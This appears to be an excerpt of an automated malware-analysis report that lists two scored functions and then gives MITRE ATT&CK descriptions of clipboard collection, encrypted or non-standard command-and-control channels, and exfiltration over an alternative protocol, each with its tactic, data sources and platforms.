Function 011AD6B0 Relevance: 1.6, APIs: 1, Instructions: 62
COMMON

Function 011AAFB8 Relevance: 1.5, APIs: 1, Instructions: 47
COMMON

Description:	Adversaries may collect data stored in the clipboard from users copying information within or between applications.
Tactics:	Collection
Data Sources:	Command: Command Execution, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using a protocol and port pairing that are typically not associated. For example, HTTPS over port 8088or port 587as opposed to the traditional port 443. Adversaries may make changes to the standard port used by a protocol to bypass filtering or muddle analysis/parsing of network data.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may steal data by exfiltrating it over a different protocol than that of the existing command and control channel. The data may also be sent to an alternate network location from the main command and control server.
Tactics:	Exfiltration
Data Sources:	Application Log: Application Log Content, Cloud Storage: Cloud Storage Access, Command: Command Execution, File: File Access, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Google Workspace, IaaS, Linux, macOS, Network, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre